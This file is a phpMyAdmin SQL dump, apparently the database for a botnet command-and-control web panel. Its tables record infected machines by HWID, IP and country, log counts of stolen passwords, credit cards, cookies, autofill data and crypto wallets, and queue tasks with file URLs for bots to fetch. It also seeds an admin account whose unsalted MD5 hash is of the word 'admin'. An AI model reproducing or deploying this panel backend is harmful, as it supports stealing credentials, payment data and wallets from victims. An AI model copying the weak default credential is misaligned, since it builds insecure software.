File "gom_v4.sql"
Full Path: /home/cananyalcin/public_html/webpanel/gom_v4.sql
File size: 3.69 KB
MIME-type: text/x-Algol68
Charset: utf-8
-- phpMyAdmin SQL Dump
-- version 5.1.1
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Nov 04, 2021 at 06:45 PM
-- Server version: 10.4.21-MariaDB
-- PHP Version: 7.3.31
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `gom_v4`
--
-- --------------------------------------------------------
--
-- Table structure for table `bot`
--
CREATE TABLE `bot` (
`ID_Bot` int(11) NOT NULL,
`HWID` varchar(150) COLLATE utf8_unicode_ci NOT NULL,
`IP` varchar(250) COLLATE utf8_unicode_ci NOT NULL,
`Country` varchar(50) COLLATE utf8_unicode_ci NOT NULL,
`Date_Time` varchar(250) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
-- --------------------------------------------------------
--
-- Table structure for table `completed`
--
CREATE TABLE `completed` (
`id_c` int(11) NOT NULL,
`hwid` varchar(500) NOT NULL,
`task_id` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
-- --------------------------------------------------------
--
-- Table structure for table `logs`
--
CREATE TABLE `logs` (
`id_log` int(11) NOT NULL,
`hwid` varchar(600) NOT NULL,
`Passwords` int(11) NOT NULL,
`CreditCards` int(11) NOT NULL,
`Cookies` int(11) NOT NULL,
`AutoFill` int(11) NOT NULL,
`Wallets` int(11) NOT NULL,
`File_log` varchar(700) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
-- --------------------------------------------------------
--
-- Table structure for table `tasks`
--
CREATE TABLE `tasks` (
`task_id` int(11) NOT NULL,
`task_type` varchar(300) NOT NULL,
`url_file` text CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
-- --------------------------------------------------------
--
-- Table structure for table `users`
--
CREATE TABLE `users` (
`id_user` int(11) NOT NULL,
`username` varchar(55) COLLATE utf8_unicode_ci NOT NULL,
`password` varchar(256) COLLATE utf8_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
--
-- Dumping data for table `users`
--
INSERT INTO `users` (`id_user`, `username`, `password`) VALUES
(1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
--
-- Indexes for dumped tables
--
--
-- Indexes for table `bot`
--
ALTER TABLE `bot`
ADD PRIMARY KEY (`ID_Bot`);
--
-- Indexes for table `completed`
--
ALTER TABLE `completed`
ADD PRIMARY KEY (`id_c`);
--
-- Indexes for table `logs`
--
ALTER TABLE `logs`
ADD PRIMARY KEY (`id_log`);
--
-- Indexes for table `tasks`
--
ALTER TABLE `tasks`
ADD PRIMARY KEY (`task_id`);
--
-- Indexes for table `users`
--
ALTER TABLE `users`
ADD PRIMARY KEY (`id_user`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `bot`
--
ALTER TABLE `bot`
MODIFY `ID_Bot` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `completed`
--
ALTER TABLE `completed`
MODIFY `id_c` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `logs`
--
ALTER TABLE `logs`
MODIFY `id_log` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `tasks`
--
ALTER TABLE `tasks`
MODIFY `task_id` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
MODIFY `id_user` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;